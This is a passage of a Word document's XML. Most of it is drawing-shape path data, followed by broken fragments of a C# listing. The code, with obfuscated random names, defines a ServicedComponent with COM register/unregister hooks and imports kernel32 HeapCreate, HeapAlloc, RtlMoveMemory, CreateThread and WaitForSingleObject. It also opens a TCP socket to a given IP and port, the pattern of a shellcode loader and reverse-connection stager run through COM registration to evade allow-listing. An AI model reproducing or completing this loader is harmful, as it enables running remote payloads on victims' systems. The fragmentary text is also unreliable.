517,15272e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:762.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15250" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15250;width:8990;height:370" coordorigin="1490,15250" coordsize="8990,370" path="m1510,15272l1510,15272,1510,15272,1510,15272,1510,15272,1510,15272,1510,15272,1511,15272,1512,15272,1512,15272,1514,15272,1515,15272,1517,15272,1519,15272,1521,15272,1524,15272,1528,15272,1532,15272,1536,15272,1541,15272,1546,15272,1552,15272,1559,15272,1566,15272,1575,15272,1583,15272,1593,15272,1603,15272,1615,15272,1627,15272,1640,15272,1654,15272,1668,15272,1684,15272,1701,15272,1719,15272,1738,15272,1758,15272,1780,15272,1802,15272,1826,15272,1851,15272,1877,15272,1904,15272,1933,15272,1963,15272,1995,15272,2028,15272,2063,15272,2099,15272,2136,15272,2175,15272,2216,15272,2259,15272,2303,15272,2348,15272,2396,15272,2445,15272,2496,15272,2549,15272,2604,15272,2660,15272,2719,15272,2779,15272,2841,15272,2906,15272,2972,15272,3041,15272,3112,15272,3184,15272,3259,15272,3336,15272,3416,15272,3498,15272,3582,15272,3668,15272,3757,15272,3848,15272,3941,15272,4037,15272,4136,15272,4236,15272,4340,15272,4446,15272,4555,15272,4666,15272,4780,15272,4897,15272,5017,15272,5139,15272,5264,15272,5392,15272,5523,15272,5657,15272,5793,15272,5933,15272,6076,15272,6222,15272,6370,15272,6522,15272,6677,15272,6835,15272,6997,15272,7161,15272,7329,15272,7500,15272,7675,15272,7853,15272,8034,15272,8219,15272,8407,15272,8598,15272,8793,15272,8992,15272,9194,15272,9400,15272,9609,15272,9823,15272,10039,15272,10260,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15273,10484,15273,10484,15273,10484,15273,10484,15273,10484,15274,10484,15274,10484,15274,10484,15275,10484,15275,10484,15275,10484,15276,10484,15276,10484,15277,10484,15277,10484,15278,10484,15279,10484,15279,10484,15280,10484,15281,10484,15282,10484,15283,10484,15283,10484,15284,10484,15285,10484,15286,10484,15288,10484,15289,10484,15290,10484,15291,10484,15293,10484,15294,10484,15295,10484,15297,10484,15298,10484,15300,10484,15302,10484,15304,10484,15305,10484,15307,10484,15309,10484,15311,10484,15313,10484,15316,10484,15318,10484,15320,10484,15323,10484,15325,10484,15328,10484,15330,10484,15333,10484,15336,10484,15339,10484,15342,10484,15345,10484,15348,10484,15351,10484,15355,10484,15358,10484,15362,10484,15366,10484,15369,10484,15373,10484,15377,10484,15381,10484,15385,10484,15390,10484,15394,10484,15398,10484,15403,10484,15408,10484,15412,10484,15417,10484,15422,10484,15428,10484,15433,10484,15438,10484,15444,10484,15449,10484,15455,10484,15461,10484,15467,10484,15473,10484,15479,10484,15485,10484,15492,10484,15499,10484,15505,10484,15512,10484,15519,10484,15526,10484,15534,10484,15541,10484,15548,10484,15556,10484,15564,10484,15572,10484,15580,10484,15588,10484,15597,10484,15605,10484,15614,10484,15623,10484,15632,10484,15632,10484,15632,10484,15632,10484,15632,10484,15632,10484,15632,10483,15632,10482,15632,10482,15632,10480,15632,10479,15632,10477,15632,10475,15632,10473,15632,10470,15632,10466,15632,10462,15632,10458,15632,10453,15632,10448,15632,10442,15632,10435,15632,10428,15632,10419,15632,10411,15632,10401,15632,10391,15632,10379,15632,10367,15632,10354,15632,10340,15632,10326,15632,10310,15632,10293,15632,10275,15632,10256,15632,10236,15632,10215,15632,10192,15632,10168,15632,10143,15632,10117,15632,10090,15632,10061,15632,10031,15632,9999,15632,9966,15632,9931,15632,9895,15632,9858,15632,9819,15632,9778,15632,9735,15632,9691,15632,9646,15632,9598,15632,9549,15632,9498,15632,9445,15632,9391,15632,9334,15632,9275,15632,9215,15632,9153,15632,9088,15632,9022,15632,8953,15632,8883,15632,8810,15632,8735,15632,8658,15632,8578,15632,8497,15632,8413,15632,8326,15632,8238,15632,8146,15632,8053,15632,7957,15632,7859,15632,7758,15632,7654,15632,7548,15632,7439,15632,7328,15632,7214,15632,7097,15632,6977,15632,6855,15632,6730,15632,6602,15632,6471,15632,6337,15632,6201,15632,6061,15632,5918,15632,5773,15632,5624,15632,5472,15632,5317,15632,5159,15632,4997,15632,4833,15632,4665,15632,4494,15632,4319,15632,4141,15632,3960,15632,3776,15632,3587,15632,3396,15632,3201,15632,3002,15632,2800,15632,2594,15632,2385,15632,2172,15632,1955,15632,1734,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15631,1510,15631,1510,15631,1510,15631,1510,15631,1510,15631,1510,15630,1510,15630,1510,15630,1510,15630,1510,15629,1510,15629,1510,15629,1510,15628,1510,15628,1510,15627,1510,15627,1510,15626,1510,15626,1510,15625,1510,15624,1510,15623,1510,15623,1510,15622,1510,15621,1510,15620,1510,15619,1510,15618,1510,15617,1510,15616,1510,15615,1510,15614,1510,15612,1510,15611,1510,15610,1510,15608,1510,15607,1510,15605,1510,15604,1510,15602,1510,15600,1510,15598,1510,15596,1510,15594,1510,15592,1510,15590,1510,15588,1510,15586,1510,15583,1510,15581,1510,15578,1510,15576,1510,15573,1510,15570,1510,15568,1510,15565,1510,15562,1510,15559,1510,15555,1510,15552,1510,15549,1510,15545,1510,15542,1510,15538,1510,15534,1510,15530,1510,15526,1510,15522,1510,15518,1510,15514,1510,15510,1510,15505,1510,15501,1510,15496,1510,15491,1510,15486,1510,15481,1510,15476,1510,15471,1510,15465,1510,15460,1510,15454,1510,15449,1510,15443,1510,15437,1510,15431,1510,15424,1510,15418,1510,15412,1510,15405,1510,15398,1510,15391,1510,15384,1510,15377,1510,15370,1510,15363,1510,15355,1510,15347,1510,15340,1510,15332,1510,15323,1510,15315,1510,15307,1510,15298,1510,15290,1510,15281,1510,15272e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:762.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15250" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15250;width:30;height:370" coordorigin="1490,15250" coordsize="30,370" path="m1517,15272l1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15273,1517,15273,1517,15273,1517,15273,1517,15273,1517,15274,1517,15274,1517,15274,1517,15275,1517,15275,1517,15275,1517,15276,1517,15276,1517,15277,1517,15277,1517,15278,1517,15279,1517,15279,1517,15280,1517,15281,1517,15282,1517,15283,1517,15283,1517,15284,1517,15285,1517,15286,1517,15288,1517,15289,1517,15290,1517,15291,1517,15293,1517,15294,1517,15295,1517,15297,1517,15298,1517,15300,1517,15302,1517,15304,1517,15305,1517,15307,1517,15309,1517,15311,1517,15313,1517,15316,1517,15318,1517,15320,1517,15323,1517,15325,1517,15328,1517,15330,1517,15333,1517,15336,1517,15339,1517,15342,1517,15345,1517,15348,1517,15351,1517,15355,1517,15358,1517,15362,1517,15366,1517,15369,1517,15373,1517,15377,1517,15381,1517,15385,1517,15390,1517,15394,1517,15398,1517,15403,1517,15408,1517,15412,1517,15417,1517,15422,1517,15428,1517,15433,1517,15438,1517,15444,1517,15449,1517,15455,1517,15461,1517,15467,1517,15473,1517,15479,1517,15485,1517,15492,1517,15499,1517,15505,1517,15512,1517,15519,1517,15526,1517,15534,1517,15541,1517,15548,1517,15556,1517,15564,1517,15572,1517,15580,1517,15588,1517,15597,1517,15605,1517,15614,1517,15623,1517,15632e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:252.500pt;margin-top:645.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5050,12910" coordsize="130,270">
        <v:shape style="position:absolute;left:5050;top:12910;width:130;height:270" coordorigin="5050,12910" coordsize="130,270" path="m5067,12931l5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5067,12931,5068,12931,5068,12931,5068,12931,5068,12931,5068,12931,5068,12931,5068,12931,5069,12931,5069,12931,5069,12931,5069,12931,5070,12931,5070,12931,5070,12931,5070,12931,5071,12931,5071,12931,5071,12931,5072,12931,5072,12931,5073,12931,5073,12931,5073,12931,5074,12931,5074,12931,5075,12931,5075,12931,5076,12931,5077,12931,5077,12931,5078,12931,5078,12931,5079,12931,5080,12931,5080,12931,5081,12931,5082,12931,5083,12931,5084,12931,5084,12931,5085,12931,5086,12931,5087,12931,5088,12931,5089,12931,5090,12931,5091,12931,5092,12931,5093,12931,5094,12931,5095,12931,5097,12931,5098,12931,5099,12931,5100,12931,5102,12931,5103,12931,5104,12931,5106,12931,5107,12931,5109,12931,5110,12931,5112,12931,5113,12931,5115,12931,5117,12931,5118,12931,5120,12931,5122,12931,5124,12931,5126,12931,5128,12931,5130,12931,5132,12931,5134,12931,5136,12931,5138,12931,5140,12931,5142,12931,5144,12931,5147,12931,5149,12931,5151,12931,5154,12931,5156,12931,5159,12931,5161,12931,5164,12931,5167,12931,5169,12931,5172,12931,5175,12931,5178,12931,5181,12931,5184,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12931,5187,12932,5187,12932,5187,12932,5187,12932,5187,12932,5187,12933,5187,12933,5187,12933,5187,12933,5187,12934,5187,12934,5187,12935,5187,12935,5187,12935,5187,12936,5187,12936,5187,12937,5187,12938,5187,12938,5187,12939,5187,12939,5187,12940,5187,12941,5187,12942,5187,12943,5187,12943,5187,12944,5187,12945,5187,12946,5187,12947,5187,12948,5187,12949,5187,12951,5187,12952,5187,12953,5187,12954,5187,12956,5187,12957,5187,12959,5187,12960,5187,12962,5187,12963,5187,12965,5187,12967,5187,12968,5187,12970,5187,12972,5187,12974,5187,12976,5187,12978,5187,12980,5187,12982,5187,12985,5187,12987,5187,12989,5187,12992,5187,12994,5187,12997,5187,13000,5187,13002,5187,13005,5187,13008,5187,13011,5187,13014,5187,13017,5187,13020,5187,13023,5187,13027,5187,13030,5187,13034,5187,13037,5187,13041,5187,13045,5187,13048,5187,13052,5187,13056,5187,13060,5187,13064,5187,13069,5187,13073,5187,13077,5187,13082,5187,13086,5187,13091,5187,13096,5187,13101,5187,13106,5187,13111,5187,13116,5187,13121,5187,13127,5187,13132,5187,13138,5187,13143,5187,13149,5187,13155,5187,13161,5187,13167,5187,13173,5187,13179,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5187,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5186,13186,5185,13186,5185,13186,5185,13186,5185,13186,5185,13186,5185,13186,5184,13186,5184,13186,5184,13186,5184,13186,5184,13186,5183,13186,5183,13186,5183,13186,5182,13186,5182,13186,5182,13186,5181,13186,5181,13186,5181,13186,5180,13186,5180,13186,5179,13186,5179,13186,5178,13186,5178,13186,5177,13186,5177,13186,5176,13186,5175,13186,5175,13186,5174,13186,5173,13186,5173,13186,5172,13186,5171,13186,5170,13186,5170,13186,5169,13186,5168,13186,5167,13186,5166,13186,5165,13186,5164,13186,5163,13186,5162,13186,5161,13186,5160,13186,5159,13186,5158,13186,5157,13186,5155,13186,5154,13186,5153,13186,5151,13186,5150,13186,5149,13186,5147,13186,5146,13186,5144,13186,5143,13186,5141,13186,5140,13186,5138,13186,5136,13186,5135,13186,5133,13186,5131,13186,5129,13186,5127,13186,5126,13186,5124,13186,5122,13186,5120,13186,5117,13186,5115,13186,5113,13186,5111,13186,5109,13186,5106,13186,5104,13186,5102,13186,5099,13186,5097,13186,5094,13186,5092,13186,5089,13186,5087,13186,5084,13186,5081,13186,5078,13186,5075,13186,5073,13186,5070,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13186,5067,13185,5067,13185,5067,13185,5067,13185,5067,13185,5067,13185,5067,13185,5067,13185,5067,13185,5067,13185,5067,13184,5067,13184,5067,13184,5067,13184,5067,13184,5067,13183,5067,13183,5067,13183,5067,13182,5067,13182,5067,13182,5067,13181,5067,13181,5067,13180,5067,13180,5067,13179,5067,13179,5067,13178,5067,13177,5067,13177,5067,13176,5067,13175,5067,13174,5067,13174,5067,13173,5067,13172,5067,13171,5067,13170,5067,13169,5067,13168,5067,13167,5067,13166,5067,13164,5067,13163,5067,13162,5067,13160,5067,13159,5067,13158,5067,13156,5067,13155,5067,13153,5067,13151,5067,13150,5067,13148,5067,13146,5067,13144,5067,13142,5067,13140,5067,13138,5067,13136,5067,13134,5067,13131,5067,13129,5067,13127,5067,13124,5067,13122,5067,13119,5067,13117,5067,13114,5067,13111,5067,13108,5067,13105,5067,13102,5067,13099,5067,13096,5067,13093,5067,13089,5067,13086,5067,13082,5067,13079,5067,13075,5067,13072,5067,13068,5067,13064,5067,13060,5067,13056,5067,13052,5067,13047,5067,13043,5067,13039,5067,13034,5067,13030,5067,13025,5067,13020,5067,13015,5067,13010,5067,13005,5067,13000,5067,12995,5067,12990,5067,12984,5067,12979,5067,12973,5067,12967,5067,12961,5067,12955,5067,12949,5067,12943,5067,12937,5067,12931e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:677.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,13550" coordsize="130,270">
        <v:shape style="position:absolute;left:4930;top:13550;width:130;height:270" coordorigin="4930,13550" coordsize="130,270" path="m4946,13576l4946,13576,4946,13576,4946,13576,4946,13576,4946,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4947,13576,4948,13576,4948,13576,4948,13576,4948,13576,4948,13576,4948,13576,4949,13576,4949,13576,4949,13576,4949,13576,4950,13576,4950,13576,4950,13576,4950,13576,4951,13576,4951,13576,4951,13576,4952,13576,4952,13576,4953,13576,4953,13576,4953,13576,4954,13576,4954,13576,4955,13576,4955,13576,4956,13576,4957,13576,4957,13576,4958,13576,4958,13576,4959,13576,4960,13576,4960,13576,4961,13576,4962,13576,4963,13576,4963,13576,4964,13576,4965,13576,4966,13576,4967,13576,4968,13576,4969,13576,4970,13576,4971,13576,4972,13576,4973,13576,4974,13576,4975,13576,4977,13576,4978,13576,4979,13576,4980,13576,4982,13576,4983,13576,4984,13576,4986,13576,4987,13576,4989,13576,4990,13576,4992,13576,4993,13576,4995,13576,4997,13576,4998,13576,5000,13576,5002,13576,5004,13576,5006,13576,5008,13576,5010,13576,5012,13576,5014,13576,5016,13576,5018,13576,5020,13576,5022,13576,5024,13576,5027,13576,5029,13576,5031,13576,5034,13576,5036,13576,5039,13576,5041,13576,5044,13576,5047,13576,5049,13576,5052,13576,5055,13576,5058,13576,5061,13576,5064,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13576,5067,13577,5067,13577,5067,13577,5067,13577,5067,13577,5067,13577,5067,13578,5067,13578,5067,13578,5067,13579,5067,13579,5067,13579,5067,13580,5067,13580,5067,13580,5067,13581,5067,13581,5067,13582,5067,13582,5067,13583,5067,13584,5067,13584,5067,13585,5067,13586,5067,13586,5067,13587,5067,13588,5067,13589,5067,13590,5067,13591,5067,13592,5067,13593,5067,13594,5067,13595,5067,13596,5067,13597,5067,13598,5067,13600,5067,13601,5067,13602,5067,13604,5067,13605,5067,13607,5067,13609,5067,13610,5067,13612,5067,13614,5067,13616,5067,13617,5067,13619,5067,13621,5067,13623,5067,13626,5067,13628,5067,13630,5067,13632,5067,13635,5067,13637,5067,13640,5067,13642,5067,13645,5067,13648,5067,13650,5067,13653,5067,13656,5067,13659,5067,13662,5067,13666,5067,13669,5067,13672,5067,13676,5067,13679,5067,13683,5067,13686,5067,13690,5067,13694,5067,13698,5067,13702,5067,13706,5067,13710,5067,13714,5067,13718,5067,13723,5067,13727,5067,13732,5067,13737,5067,13741,5067,13746,5067,13751,5067,13756,5067,13761,5067,13767,5067,13772,5067,13777,5067,13783,5067,13789,5067,13794,5067,13800,5067,13806,5067,13812,5067,13818,5067,13825,5067,13831,5067,13831,5067,13831,5067,13831,5067,13831,5067,13831,5067,13831,5067,13831,5067,13831,5067,13831,5067,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5066,13831,5065,13831,5065,13831,5065,13831,5065,13831,5065,13831,5065,13831,5064,13831,5064,13831,5064,13831,5064,13831,5063,13831,5063,13831,5063,13831,5063,13831,5062,13831,5062,13831,5062,13831,5061,13831,5061,13831,5060,13831,5060,13831,5060,13831,5059,13831,5059,13831,5058,13831,5058,13831,5057,13831,5057,13831,5056,13831,5055,13831,5055,13831,5054,13831,5053,13831,5053,13831,5052,13831,5051,13831,5050,13831,5050,13831,5049,13831,5048,13831,5047,13831,5046,13831,5045,13831,5044,13831,5043,13831,5042,13831,5041,13831,5040,13831,5039,13831,5038,13831,5036,13831,5035,13831,5034,13831,5033,13831,5031,13831,5030,13831,5029,13831,5027,13831,5026,13831,5024,13831,5023,13831,5021,13831,5020,13831,5018,13831,5016,13831,5015,13831,5013,13831,5011,13831,5009,13831,5007,13831,5005,13831,5004,13831,5002,13831,4999,13831,4997,13831,4995,13831,4993,13831,4991,13831,4989,13831,4986,13831,4984,13831,4982,13831,4979,13831,4977,13831,4974,13831,4972,13831,4969,13831,4966,13831,4964,13831,4961,13831,4958,13831,4955,13831,4952,13831,4949,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13831,4946,13830,4946,13830,4946,13830,4946,13830,4946,13830,4946,13830,4946,13830,4946,13829,4946,13829,4946,13829,4946,13829,4946,13828,4946,13828,4946,13828,4946,13827,4946,13827,4946,13826,4946,13826,4946,13826,4946,13825,4946,13824,4946,13824,4946,13823,4946,13823,4946,13822,4946,13821,4946,13821,4946,13820,4946,13819,4946,13818,4946,13817,4946,13816,4946,13815,4946,13814,4946,13813,4946,13812,4946,13811,4946,13810,4946,13808,4946,13807,4946,13806,4946,13804,4946,13803,4946,13801,4946,13800,4946,13798,4946,13797,4946,13795,4946,13793,4946,13791,4946,13789,4946,13787,4946,13785,4946,13783,4946,13781,4946,13779,4946,13777,4946,13774,4946,13772,4946,13770,4946,13767,4946,13765,4946,13762,4946,13759,4946,13756,4946,13753,4946,13751,4946,13747,4946,13744,4946,13741,4946,13738,4946,13735,4946,13731,4946,13728,4946,13724,4946,13721,4946,13717,4946,13713,4946,13709,4946,13705,4946,13701,4946,13697,4946,13693,4946,13688,4946,13684,4946,13680,4946,13675,4946,13670,4946,13666,4946,13661,4946,13656,4946,13651,4946,13646,4946,13640,4946,13635,4946,13629,4946,13624,4946,13618,4946,13613,4946,13607,4946,13601,4946,13595,4946,13588,4946,13582,4946,13576e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:746.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,14930" coordsize="130,250">
        <v:shape style="position:absolute;left:3850;top:14930;width:130;height:250" coordorigin="3850,14930" coordsize="130,250" path="m3866,14942l3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3866,14942,3867,14942,3867,14942,3867,14942,3867,14942,3867,14942,3867,14942,3867,14942,3867,14942,3868,14942,3868,14942,3868,14942,3868,14942,3868,14942,3869,14942,3869,14942,3869,14942,3869,14942,3870,14942,3870,14942,3870,14942,3871,14942,3871,14942,3871,14942,3872,14942,3872,14942,3872,14942,3873,14942,3873,14942,3874,14942,3874,14942,3875,14942,3875,14942,3876,14942,3877,14942,3877,14942,3878,14942,3878,14942,3879,14942,3880,14942,3881,14942,3881,14942,3882,14942,3883,14942,3884,14942,3885,14942,3886,14942,3886,14942,3887,14942,3888,14942,3889,14942,3890,14942,3891,14942,3893,14942,3894,14942,3895,14942,3896,14942,3897,14942,3898,14942,3900,14942,3901,14942,3902,14942,3904,14942,3905,14942,3907,14942,3908,14942,3910,14942,3911,14942,3913,14942,3914,14942,3916,14942,3918,14942,3920,14942,3921,14942,3923,14942,3925,14942,3927,14942,3929,14942,3931,14942,3933,14942,3935,14942,3937,14942,3939,14942,3942,14942,3944,14942,3946,14942,3948,14942,3951,14942,3953,14942,3956,14942,3958,14942,3961,14942,3963,14942,3966,14942,3969,14942,3972,14942,3974,14942,3977,14942,3980,14942,3983,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14942,3986,14943,3986,14943,3986,14943,3986,14943,3986,14943,3986,14944,3986,14944,3986,14944,3986,14945,3986,14945,3986,14945,3986,14946,3986,14946,3986,14946,3986,14947,3986,14947,3986,14948,3986,14949,3986,14949,3986,14950,3986,14951,3986,14951,3986,14952,3986,14953,3986,14954,3986,14954,3986,14955,3986,14956,3986,14957,3986,14958,3986,14959,3986,14960,3986,14962,3986,14963,3986,14964,3986,14965,3986,14967,3986,14968,3986,14970,3986,14971,3986,14973,3986,14974,3986,14976,3986,14978,3986,14979,3986,14981,3986,14983,3986,14985,3986,14987,3986,14989,3986,14991,3986,14993,3986,14996,3986,14998,3986,15000,3986,15003,3986,15005,3986,15008,3986,15011,3986,15013,3986,15016,3986,15019,3986,15022,3986,15025,3986,15028,3986,15031,3986,15035,3986,15038,3986,15041,3986,15045,3986,15048,3986,15052,3986,15056,3986,15059,3986,15063,3986,15067,3986,15071,3986,15075,3986,15080,3986,15084,3986,15088,3986,15093,3986,15098,3986,15102,3986,15107,3986,15112,3986,15117,3986,15122,3986,15127,3986,15132,3986,15138,3986,15143,3986,15149,3986,15154,3986,15160,3986,15166,3986,15172,3986,15178,3986,15184,3986,15190,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3986,15197,3985,15197,3985,15197,3985,15197,3985,15197,3985,15197,3985,15197,3985,15197,3985,15197,3984,15197,3984,15197,3984,15197,3984,15197,3984,15197,3983,15197,3983,15197,3983,15197,3983,15197,3982,15197,3982,15197,3982,15197,3981,15197,3981,15197,3981,15197,3980,15197,3980,15197,3980,15197,3979,15197,3979,15197,3978,15197,3978,15197,3977,15197,3977,15197,3976,15197,3975,15197,3975,15197,3974,15197,3973,15197,3973,15197,3972,15197,3971,15197,3971,15197,3970,15197,3969,15197,3968,15197,3967,15197,3966,15197,3966,15197,3965,15197,3964,15197,3963,15197,3962,15197,3961,15197,3959,15197,3958,15197,3957,15197,3956,15197,3955,15197,3953,15197,3952,15197,3951,15197,3950,15197,3948,15197,3947,15197,3945,15197,3944,15197,3942,15197,3941,15197,3939,15197,3937,15197,3936,15197,3934,15197,3932,15197,3931,15197,3929,15197,3927,15197,3925,15197,3923,15197,3921,15197,3919,15197,3917,15197,3915,15197,3913,15197,3910,15197,3908,15197,3906,15197,3904,15197,3901,15197,3899,15197,3896,15197,3894,15197,3891,15197,3889,15197,3886,15197,3883,15197,3880,15197,3878,15197,3875,15197,3872,15197,3869,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15197,3866,15196,3866,15196,3866,15196,3866,15196,3866,15196,3866,15196,3866,15196,3866,15196,3866,15196,3866,15195,3866,15195,3866,15195,3866,15195,3866,15195,3866,15194,3866,15194,3866,15194,3866,15193,3866,15193,3866,15193,3866,15192,3866,15192,3866,15191,3866,15191,3866,15190,3866,15190,3866,15189,3866,15188,3866,15188,3866,15187,3866,15186,3866,15185,3866,15185,3866,15184,3866,15183,3866,15182,3866,15181,3866,15180,3866,15179,3866,15178,3866,15177,3866,15175,3866,15174,3866,15173,3866,15171,3866,15170,3866,15169,3866,15167,3866,15166,3866,15164,3866,15162,3866,15161,3866,15159,3866,15157,3866,15155,3866,15153,3866,15151,3866,15149,3866,15147,3866,15145,3866,15142,3866,15140,3866,15138,3866,15135,3866,15133,3866,15130,3866,15128,3866,15125,3866,15122,3866,15119,3866,15116,3866,15113,3866,15110,3866,15107,3866,15104,3866,15100,3866,15097,3866,15093,3866,15090,3866,15086,3866,15083,3866,15079,3866,15075,3866,15071,3866,15067,3866,15063,3866,15058,3866,15054,3866,15050,3866,15045,3866,15041,3866,15036,3866,15031,3866,15026,3866,15021,3866,15016,3866,15011,3866,15006,3866,15001,3866,14995,3866,14990,3866,14984,3866,14978,3866,14972,3866,14966,3866,14960,3866,14954,3866,14948,3866,14942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93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Net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Linq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Net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ckets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Runtime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InteropServices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Threading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usin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g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EnterpriseServices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using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System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Windows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Forms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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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namespace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HYlDKsYF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371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public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class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kxKhdVzWQXolmmF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ServicedComponent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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="311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public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kxKhdVzWQXolmmF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="18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Console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WriteLine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"doge"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7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ComRegisterFunction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public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void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RegisterClass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string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pNNHrTZzW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ZApOAKJKY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QYJOTklTwn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50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13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ComUnregisterFunction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23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public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void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UnRegisterClass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string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pNNHrTZzW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ZApOAKJKY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QYJOTklTwn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9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950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20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public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class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ZApOAKJKY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DllImport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"kernel32"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private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extern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HeapCreate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FJyyNB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fwtsYaiizj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dHJhaXQiaqW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45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DllImport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"kernel32"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private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extern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HeapAlloc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bqtaDNfVCzVox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hjDFdZuT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JAVAYBFdojxsgo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DllImport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"kernel32"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private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extern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RtlMoveMemory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UIn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AQdEyOhn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wknmfaRmoElGo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yRXPRezIkcorSOo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DllImport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"kernel32"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private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extern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IntPtr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CreateThread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UInt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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uQgiOlrrBaR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BxkWKqEKnp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lelfRubuprxr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IntPtr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qPzVKjdiF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kNXJcS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ref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atiLJcRPnhfyGvp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56" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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26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DllImport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"kernel32"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private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extern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WaitForSingleObje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ct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IntPtr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XSjyzoKzGmuIOcD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VumUGj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HMSjEXjuIzkkmo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ring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aCWWUttzmy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int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iJGvqiEDGLhjr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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="99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IPEndPoint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YUXVAnzAurxH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IPEndPoint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IPAddress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Parse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aCWWUttzmy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iJGvqiEDGLhjr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28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Socket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MXCEuiuRIWgOYze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17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Socket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AddressFamily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InterNetwork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Socke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tType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Stream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ProtocolType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Tcp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29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try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MXCEuiuRIWgOYze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.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Connect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YUXVAnzAurxH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}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30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catch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return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null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31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Bjpvhc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MXCEuiuRIWgOYze</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
